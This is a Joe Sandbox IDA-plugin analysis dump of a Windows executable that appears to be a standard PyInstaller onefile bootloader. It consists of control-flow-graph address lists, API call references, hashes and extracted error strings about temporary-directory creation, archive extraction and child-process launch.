37 API calls 16719->16722 16719->16727 16720->16724 16721 7ff78da5c5c0 _log10_special 8 API calls 16723 7ff78da63e5a 16721->16723 16722->16724 16723->16656 16725 7ff78da64830 45 API calls 16724->16725 16724->16727 16728 7ff78da63d4c 16724->16728 16725->16728 16726 7ff78da6ea78 46 API calls 16726->16728 16727->16721 16728->16726 16728->16727 17009 7ff78da61038 16729->17009 16733 7ff78da641ee 16732->16733 16795 7ff78da60bf0 16733->16795 16738 7ff78da64830 45 API calls 16741 7ff78da64333 16738->16741 16739 7ff78da643c1 16739->16688 16739->16739 16740 7ff78da64830 45 API calls 16740->16739 16741->16739 16741->16740 16741->16741 16745 7ff78da64539 16742->16745 16743 7ff78da6457e 16743->16688 16744 7ff78da64557 16747 7ff78da6ea78 46 API calls 16744->16747 16745->16743 16745->16744 16746 7ff78da64830 45 API calls 16745->16746 16746->16744 16747->16743 16751 7ff78da645e9 16748->16751 16749 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16750 7ff78da6461a 16749->16750 16750->16688 16751->16749 16751->16750 16754 7ff78da61df7 16752->16754 16753 7ff78da61e26 16758 7ff78da61e63 16753->16758 16941 7ff78da60c98 16753->16941 16754->16753 16756 7ff78da61ee3 16754->16756 16757 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16756->16757 16757->16758 16758->16688 16760 7ff78da619e7 16759->16760 16761 7ff78da61a16 16760->16761 16763 7ff78da61ad3 16760->16763 16762 7ff78da60c98 12 API calls 16761->16762 16765 7ff78da61a53 16761->16765 16762->16765 16764 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16763->16764 16764->16765 16765->16688 16767 7ff78da6475f 16766->16767 16769 7ff78da64763 __crtLCMapStringW 16767->16769 16949 7ff78da647b8 16767->16949 16769->16688 16771 7ff78da62207 16770->16771 16772 7ff78da62236 16771->16772 16775 7ff78da622f3 16771->16775 16773 7ff78da62273 16772->16773 16774 7ff78da60c98 12 API calls 16772->16774 16773->16688 16774->16773 16776 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16775->16776 16776->16773 16778 7ff78da64847 16777->16778 
16953 7ff78da6da28 16778->16953 16785 7ff78da6eaa9 16783->16785 16793 7ff78da6eab7 16783->16793 16784 7ff78da6ead7 16787 7ff78da6eae8 16784->16787 16788 7ff78da6eb0f 16784->16788 16785->16784 16786 7ff78da64830 45 API calls 16785->16786 16785->16793 16786->16784 16999 7ff78da70110 16787->16999 16790 7ff78da6eb39 16788->16790 16791 7ff78da6eb9a 16788->16791 16788->16793 16790->16793 17002 7ff78da6f910 16790->17002 16792 7ff78da6f910 _fread_nolock MultiByteToWideChar 16791->16792 16792->16793 16793->16691 16796 7ff78da60c27 16795->16796 16802 7ff78da60c16 16795->16802 16796->16802 16825 7ff78da6d66c 16796->16825 16799 7ff78da60c68 16800 7ff78da6a9b8 __free_lconv_num 11 API calls 16799->16800 16800->16802 16801 7ff78da6a9b8 __free_lconv_num 11 API calls 16801->16799 16803 7ff78da6e5e0 16802->16803 16804 7ff78da6e5fd 16803->16804 16805 7ff78da6e630 16803->16805 16806 7ff78da6a884 _invalid_parameter_noinfo 37 API calls 16804->16806 16805->16804 16807 7ff78da6e662 16805->16807 16816 7ff78da64311 16806->16816 16812 7ff78da6e775 16807->16812 16820 7ff78da6e6aa 16807->16820 16808 7ff78da6e867 16865 7ff78da6dacc 16808->16865 16810 7ff78da6e82d 16858 7ff78da6de64 16810->16858 16811 7ff78da6e7fc 16851 7ff78da6e144 16811->16851 16812->16808 16812->16810 16812->16811 16814 7ff78da6e7bf 16812->16814 16817 7ff78da6e7b5 16812->16817 16841 7ff78da6e374 16814->16841 16816->16738 16816->16741 16817->16810 16819 7ff78da6e7ba 16817->16819 16819->16811 16819->16814 16820->16816 16832 7ff78da6a514 16820->16832 16823 7ff78da6a970 _isindst 17 API calls 16824 7ff78da6e8c4 16823->16824 16826 7ff78da6d6b7 16825->16826 16831 7ff78da6d67b memcpy_s 16825->16831 16827 7ff78da64f78 memcpy_s 11 API calls 16826->16827 16829 7ff78da60c54 16827->16829 16828 7ff78da6d69e HeapAlloc 16828->16829 16828->16831 16829->16799 16829->16801 16830 7ff78da73600 memcpy_s 2 API calls 16830->16831 16831->16826 16831->16828 16831->16830 16833 7ff78da6a52b 16832->16833 16834 7ff78da6a521 16832->16834 16835 7ff78da64f78 
18772 7ff78da6583a 18770->18772 18774 7ff78da658ff 18771->18774 18775 7ff78da65921 18771->18775 18773 7ff78da65866 GetFileInformationByHandle 18772->18773 18777 7ff78da65b70 21 API calls 18772->18777 18778 7ff78da6588f 18773->18778 18779 7ff78da65912 GetLastError 18773->18779 18774->18779 18780 7ff78da65903 18774->18780 18776 7ff78da65944 PeekNamedPipe 18775->18776 18794 7ff78da658e2 18775->18794 18776->18794 18782 7ff78da65854 18777->18782 18783 7ff78da65a34 51 API calls 18778->18783 18781 7ff78da64eec _fread_nolock 11 API calls 18779->18781 18784 7ff78da64f78 memcpy_s 11 API calls 18780->18784 18781->18794 18782->18773 18782->18794 18786 7ff78da6589a 18783->18786 18784->18794 18785 7ff78da5c5c0 _log10_special 8 API calls 18788 7ff78da65724 18785->18788 18834 7ff78da65994 18786->18834 18788->18760 18788->18761 18790 7ff78da65994 10 API calls 18791 7ff78da658b9 18790->18791 18792 7ff78da65994 10 API calls 18791->18792 18793 7ff78da658ca 18792->18793 18793->18794 18795 7ff78da64f78 memcpy_s 11 API calls 18793->18795 18794->18785 18795->18794 18797 7ff78da65caa 18796->18797 18798 7ff78da64f78 memcpy_s 11 API calls 18797->18798 18816 7ff78da65d42 __std_exception_destroy 18797->18816 18800 7ff78da65cbc 18798->18800 18799 7ff78da5c5c0 _log10_special 8 API calls 18801 7ff78da65751 18799->18801 18802 7ff78da64f78 memcpy_s 11 API calls 18800->18802 18801->18762 18801->18763 18803 7ff78da65cc4 18802->18803 18804 7ff78da67e78 45 API calls 18803->18804 18805 7ff78da65cd9 18804->18805 18806 7ff78da65ceb 18805->18806 18807 7ff78da65ce1 18805->18807 18809 7ff78da64f78 memcpy_s 11 API calls 18806->18809 18808 7ff78da64f78 memcpy_s 11 API calls 18807->18808 18812 7ff78da65ce6 18808->18812 18810 7ff78da65cf0 18809->18810 18811 7ff78da64f78 memcpy_s 11 API calls 18810->18811 18810->18816 18813 7ff78da65cfa 18811->18813 18814 7ff78da65d34 GetDriveTypeW 18812->18814 18812->18816 18815 7ff78da67e78 45 API calls 18813->18815 18814->18816 18815->18812 18816->18799 18819 7ff78da65a5c 
18817->18819 18818 7ff78da6578d 18827 7ff78da65b70 18818->18827 18819->18818 18841 7ff78da6f794 18819->18841 18821 7ff78da65af0 18821->18818 18822 7ff78da6f794 51 API calls 18821->18822 18823 7ff78da65b03 18822->18823 18823->18818 18824 7ff78da6f794 51 API calls 18823->18824 18825 7ff78da65b16 18824->18825 18825->18818 18826 7ff78da6f794 51 API calls 18825->18826 18826->18818 18828 7ff78da65b8a 18827->18828 18829 7ff78da65bc1 18828->18829 18830 7ff78da65b9a 18828->18830 18831 7ff78da6f628 21 API calls 18829->18831 18832 7ff78da64eec _fread_nolock 11 API calls 18830->18832 18833 7ff78da65baa 18830->18833 18831->18833 18832->18833 18833->18769 18835 7ff78da659bd FileTimeToSystemTime 18834->18835 18836 7ff78da659b0 18834->18836 18837 7ff78da659d1 SystemTimeToTzSpecificLocalTime 18835->18837 18838 7ff78da659b8 18835->18838 18836->18835 18836->18838 18837->18838 18839 7ff78da5c5c0 _log10_special 8 API calls 18838->18839 18840 7ff78da658a9 18839->18840 18840->18790 18842 7ff78da6f7c5 18841->18842 18843 7ff78da6f7a1 18841->18843 18845 7ff78da6f7ff 18842->18845 18848 7ff78da6f81e 18842->18848 18843->18842 18844 7ff78da6f7a6 18843->18844 18846 7ff78da64f78 memcpy_s 11 API calls 18844->18846 18847 7ff78da64f78 memcpy_s 11 API calls 18845->18847 18849 7ff78da6f7ab 18846->18849 18850 7ff78da6f804 18847->18850 18851 7ff78da64fbc 45 API calls 18848->18851 18852 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 18849->18852 18854 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 18850->18854 18856 7ff78da6f82b 18851->18856 18853 7ff78da6f7b6 18852->18853 18853->18821 18855 7ff78da6f80f 18854->18855 18855->18821 18856->18855 18857 7ff78da7054c 51 API calls 18856->18857 18857->18856 20635 7ff78da71720 20646 7ff78da77454 20635->20646 20647 7ff78da77461 20646->20647 20648 7ff78da6a9b8 __free_lconv_num 11 API calls 20647->20648 20650 7ff78da7747d 20647->20650 20648->20647 20649 7ff78da6a9b8 __free_lconv_num 11 API calls 20649->20650 20650->20649 20651 7ff78da71729 20650->20651 
20652 7ff78da70348 EnterCriticalSection 20651->20652 19582 7ff78da77c90 19585 7ff78da72660 19582->19585 19586 7ff78da7266d 19585->19586 19587 7ff78da726b2 19585->19587 19591 7ff78da6b294 19586->19591 19592 7ff78da6b2a5 FlsGetValue 19591->19592 19593 7ff78da6b2c0 FlsSetValue 19591->19593 19594 7ff78da6b2ba 19592->19594 19595 7ff78da6b2b2 19592->19595 19593->19595 19596 7ff78da6b2cd 19593->19596 19594->19593 19597 7ff78da6a574 _CreateFrameInfo 45 API calls 19595->19597 19599 7ff78da6b2b8 19595->19599 19598 7ff78da6ec08 memcpy_s 11 API calls 19596->19598 19600 7ff78da6b335 19597->19600 19601 7ff78da6b2dc 19598->19601 19611 7ff78da72334 19599->19611 19602 7ff78da6b2fa FlsSetValue 19601->19602 19603 7ff78da6b2ea FlsSetValue 19601->19603 19604 7ff78da6b318 19602->19604 19605 7ff78da6b306 FlsSetValue 19602->19605 19606 7ff78da6b2f3 19603->19606 19607 7ff78da6af64 memcpy_s 11 API calls 19604->19607 19605->19606 19608 7ff78da6a9b8 __free_lconv_num 11 API calls 19606->19608 19609 7ff78da6b320 19607->19609 19608->19595 19610 7ff78da6a9b8 __free_lconv_num 11 API calls 19609->19610 19610->19599 19634 7ff78da725a4 19611->19634 19613 7ff78da72369 19649 7ff78da72034 19613->19649 19616 7ff78da6d66c _fread_nolock 12 API calls 19617 7ff78da72397 19616->19617 19618 7ff78da7239f 19617->19618 19620 7ff78da723ae 19617->19620 19619 7ff78da6a9b8 __free_lconv_num 11 API calls 19618->19619 19632 7ff78da72386 19619->19632 19620->19620 19656 7ff78da726dc 19620->19656 19623 7ff78da724aa 19624 7ff78da64f78 memcpy_s 11 API calls 19623->19624 19625 7ff78da724af 19624->19625 19627 7ff78da6a9b8 __free_lconv_num 11 API calls 19625->19627 19626 7ff78da72505 19633 7ff78da7256c 19626->19633 19667 7ff78da71e64 19626->19667 19627->19632 19628 7ff78da724c4 19628->19626 19630 7ff78da6a9b8 __free_lconv_num 11 API calls 19628->19630 19629 7ff78da6a9b8 __free_lconv_num 11 API calls 19629->19632 19630->19626 19632->19587 19633->19629 19635 7ff78da725c7 19634->19635 19636 7ff78da725d1 19635->19636 19682 
7ff78da70348 EnterCriticalSection 19635->19682 19639 7ff78da72643 19636->19639 19641 7ff78da6a574 _CreateFrameInfo 45 API calls 19636->19641 19639->19613 19642 7ff78da7265b 19641->19642 19645 7ff78da726b2 19642->19645 19646 7ff78da6b294 50 API calls 19642->19646 19645->19613 19647 7ff78da7269c 19646->19647 19648 7ff78da72334 65 API calls 19647->19648 19648->19645 19650 7ff78da64fbc 45 API calls 19649->19650 19651 7ff78da72048 19650->19651 19652 7ff78da72066 19651->19652 19653 7ff78da72054 GetOEMCP 19651->19653 19654 7ff78da7207b 19652->19654 19655 7ff78da7206b GetACP 19652->19655 19653->19654 19654->19616 19654->19632 19655->19654 19657 7ff78da72034 47 API calls 19656->19657 19658 7ff78da72709 19657->19658 19659 7ff78da7285f 19658->19659 19660 7ff78da72746 IsValidCodePage 19658->19660 19666 7ff78da72760 memcpy_s 19658->19666 19661 7ff78da5c5c0 _log10_special 8 API calls 19659->19661 19660->19659 19662 7ff78da72757 19660->19662 19663 7ff78da724a1 19661->19663 19664 7ff78da72786 GetCPInfo 19662->19664 19662->19666 19663->19623 19663->19628 19664->19659 19664->19666 19683 7ff78da7214c 19666->19683 19739 7ff78da70348 EnterCriticalSection 19667->19739 19684 7ff78da72189 GetCPInfo 19683->19684 19685 7ff78da7227f 19683->19685 19684->19685 19690 7ff78da7219c 19684->19690 19686 7ff78da5c5c0 _log10_special 8 API calls 19685->19686 19688 7ff78da7231e 19686->19688 19687 7ff78da72eb0 48 API calls 19689 7ff78da72213 19687->19689 19688->19659 19694 7ff78da77bf4 19689->19694 19690->19687 19693 7ff78da77bf4 54 API calls 19693->19685 19695 7ff78da64fbc 45 API calls 19694->19695 19696 7ff78da77c19 19695->19696 19699 7ff78da778c0 19696->19699 19700 7ff78da77901 19699->19700 19701 7ff78da6f910 _fread_nolock MultiByteToWideChar 19700->19701 19705 7ff78da7794b 19701->19705 19702 7ff78da77bc9 19703 7ff78da5c5c0 _log10_special 8 API calls 19702->19703 19704 7ff78da72246 19703->19704 19704->19693 19705->19702 19706 7ff78da6d66c _fread_nolock 12 API calls 19705->19706 19707 7ff78da77983 
19705->19707 19718 7ff78da77a81 19705->19718 19706->19707 19709 7ff78da6f910 _fread_nolock MultiByteToWideChar 19707->19709 19707->19718 19708 7ff78da6a9b8 __free_lconv_num 11 API calls 19708->19702 19710 7ff78da779f6 19709->19710 19710->19718 19730 7ff78da6f154 19710->19730 19713 7ff78da77a41 19715 7ff78da6f154 __crtLCMapStringW 6 API calls 19713->19715 19713->19718 19714 7ff78da77a92 19716 7ff78da6d66c _fread_nolock 12 API calls 19714->19716 19717 7ff78da77b64 19714->19717 19720 7ff78da77ab0 19714->19720 19715->19718 19716->19720 19717->19718 19719 7ff78da6a9b8 __free_lconv_num 11 API calls 19717->19719 19718->19702 19718->19708 19719->19718 19720->19718 19721 7ff78da6f154 __crtLCMapStringW 6 API calls 19720->19721 19722 7ff78da77b30 19721->19722 19722->19717 19723 7ff78da77b66 19722->19723 19724 7ff78da77b50 19722->19724 19726 7ff78da70858 WideCharToMultiByte 19723->19726 19725 7ff78da70858 WideCharToMultiByte 19724->19725 19727 7ff78da77b5e 19725->19727 19726->19727 19727->19717 19728 7ff78da77b7e 19727->19728 19728->19718 19729 7ff78da6a9b8 __free_lconv_num 11 API calls 19728->19729 19729->19718 19731 7ff78da6ed80 __crtLCMapStringW 5 API calls 19730->19731 19732 7ff78da6f192 19731->19732 19733 7ff78da6f19a 19732->19733 19736 7ff78da6f240 19732->19736 19733->19713 19733->19714 19733->19718 19735 7ff78da6f203 LCMapStringW 19735->19733 19737 7ff78da6ed80 __crtLCMapStringW 5 API calls 19736->19737 19738 7ff78da6f26e __crtLCMapStringW 19737->19738 19738->19735 20677 7ff78da6c590 20688 7ff78da70348 EnterCriticalSection 20677->20688 19929 7ff78da6f9fc 19930 7ff78da6fbee 19929->19930 19932 7ff78da6fa3e _isindst 19929->19932 19931 7ff78da64f78 memcpy_s 11 API calls 19930->19931 19949 7ff78da6fbde 19931->19949 19932->19930 19935 7ff78da6fabe _isindst 19932->19935 19933 7ff78da5c5c0 _log10_special 8 API calls 19934 7ff78da6fc09 19933->19934 19950 7ff78da76204 19935->19950 19940 7ff78da6fc1a 19942 7ff78da6a970 _isindst 17 API calls 19940->19942 19943 7ff78da6fc2e 
19942->19943 19947 7ff78da6fb1b 19947->19949 19974 7ff78da76248 19947->19974 19949->19933 19951 7ff78da76213 19950->19951 19952 7ff78da6fadc 19950->19952 19981 7ff78da70348 EnterCriticalSection 19951->19981 19956 7ff78da75608 19952->19956 19957 7ff78da6faf1 19956->19957 19958 7ff78da75611 19956->19958 19957->19940 19962 7ff78da75638 19957->19962 19959 7ff78da64f78 memcpy_s 11 API calls 19958->19959 19960 7ff78da75616 19959->19960 19961 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 19960->19961 19961->19957 19963 7ff78da75641 19962->19963 19965 7ff78da6fb02 19962->19965 19964 7ff78da64f78 memcpy_s 11 API calls 19963->19964 19966 7ff78da75646 19964->19966 19965->19940 19968 7ff78da75668 19965->19968 19967 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 19966->19967 19967->19965 19969 7ff78da6fb13 19968->19969 19970 7ff78da75671 19968->19970 19969->19940 19969->19947 19971 7ff78da64f78 memcpy_s 11 API calls 19970->19971 19972 7ff78da75676 19971->19972 19973 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 19972->19973 19973->19969 19982 7ff78da70348 EnterCriticalSection 19974->19982 19749 7ff78da65480 19750 7ff78da6548b 19749->19750 19758 7ff78da6f314 19750->19758 19771 7ff78da70348 EnterCriticalSection 19758->19771 19772 7ff78da7ae6e 19773 7ff78da7ae7d 19772->19773 19774 7ff78da7ae87 19772->19774 19776 7ff78da703a8 LeaveCriticalSection 19773->19776 19989 7ff78da7add9 19992 7ff78da654e8 LeaveCriticalSection 19989->19992

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction ID: 00645d656dbfcdce2d0d80d7951af6a87ec6c29d7a5351547e2ac7ae12678e16
• Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
• Instruction Fuzzy Hash: 9CD18372A0CA8286EB10AF74E854AB9B774FF84758FB00235DA5D43A94EF3CD949C711

Control-flow Graph

• Executed
• Not Executed
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: 7c6149c83ec295aa3824364e4806b56b50599473bc5d4fd4de40d1ca8c577362
• Instruction ID: 1a132817db7def829fbb78c57e271a0e3ee696cf273a2a4c8b821708b2050aec
• Opcode Fuzzy Hash: 7c6149c83ec295aa3824364e4806b56b50599473bc5d4fd4de40d1ca8c577362
• Instruction Fuzzy Hash: C2329F25A0C68291EA15BBA19454ABDE3B1BF85740FF44431DA5D832D2FF2CED5CC322

APIs
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: 86c50e141fdaaecc99c5f8c7d154407f4b13856111a501c7bea3cad232770921
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: F9C10032B28A4185EB50EFA4D480AAC7765FB49B98FA40235DE6E577D4EF38D819C310

APIs
• FindFirstFileW.KERNELBASE(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA5841B
• RemoveDirectoryW.KERNEL32(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA5849E
• DeleteFileW.KERNELBASE(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA584BD
• FindNextFileW.KERNELBASE(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA584CB
• FindClose.KERNEL32(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA584DC
• RemoveDirectoryW.KERNELBASE(?,00007FF78DA58B09,00007FF78DA53FA5), ref: 00007FF78DA584E5
Strings
Similarity
• API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
• String ID: %s\*
• API String ID: 1057558799-766152087
• Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction ID: 01da515a63d8fca6656361562c890f095777a27c727821a4116db5e769d13be4
• Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
• Instruction Fuzzy Hash: 73413221A0C54285EA20BBA4E4589B9A370FB98764FF00631D9AD83AD5FF3CDD4DC712
APIs
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: 7acfea21dac7172148ce9ffb628e02fbf80a6bfeb7f581dcf08e414705153f4c
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: F9F0496261C641C6F7609F90B44DB76A360BB44778F740235D9AD456D4EF3CD44DCA11

APIs
  • Part of subcall function 00007FF78DA57F80: _fread_nolock.LIBCMT ref: 00007FF78DA5802A
• _fread_nolock.LIBCMT ref: 00007FF78DA51A1B
  • Part of subcall function 00007FF78DA52910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF78DA51B6A), ref: 00007FF78DA5295E
Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                        • Opcode ID: 71146916c0c9099706f714157d3aef073617a07ebfbf74c53cf41f504c15e58d
                                                                                                                                                                                                                                        • Instruction ID: f150497cc9db9e2cc3b7950791f2096e1d46cd7d836e82e32eafdcd02b72e33c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71146916c0c9099706f714157d3aef073617a07ebfbf74c53cf41f504c15e58d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5816371A0D68686EB60FB64E040AB9B3A0FF44744FB44431D98D87785FE3DE949C762

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (rendered graph; the raw node/edge address list is omitted here)
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
• API String ID: 2050909247-1550345328
• Opcode ID: 09250c35733c7288d494a8b559120a17bced8e02cc052d24a1c7d21c225d71f9
• Instruction ID: e973284c489536ab344509efcee8815af89c3dcf702fe5c4537ab9227b9eae4e
• Opcode Fuzzy Hash: 09250c35733c7288d494a8b559120a17bced8e02cc052d24a1c7d21c225d71f9
• Instruction Fuzzy Hash: AF518C61A0C64392EA10BBA1A4409B9A360BF44B94FF44531EE5C47796FF3CED4DC762

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF78DA53CBB), ref: 00007FF78DA588F4
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF78DA53CBB), ref: 00007FF78DA588FA
• CreateDirectoryW.KERNELBASE(?,00000000,00007FF78DA53CBB), ref: 00007FF78DA5893C
• Part of subcall function 00007FF78DA58A20: GetEnvironmentVariableW.KERNEL32(00007FF78DA5388E), ref: 00007FF78DA58A57
• Part of subcall function 00007FF78DA58A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF78DA58A79
• Part of subcall function 00007FF78DA682A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA682C1
• Part of subcall function 00007FF78DA52810: MessageBoxW.USER32 ref: 00007FF78DA528EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction ID: 03c41403b48fe886777d20a678d7c4bb17a0cf89f271af35568b4e09129edb04
• Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
• Instruction Fuzzy Hash: C7419311A0D642C0EA10BBB1A8559F992A1BF85B94FF40031ED5D977D6FE3CDD48C322

Control-flow Graph

• Executed
• Not Executed
control_flow_graph (rendered graph; the raw node/edge address list is omitted here)
Strings
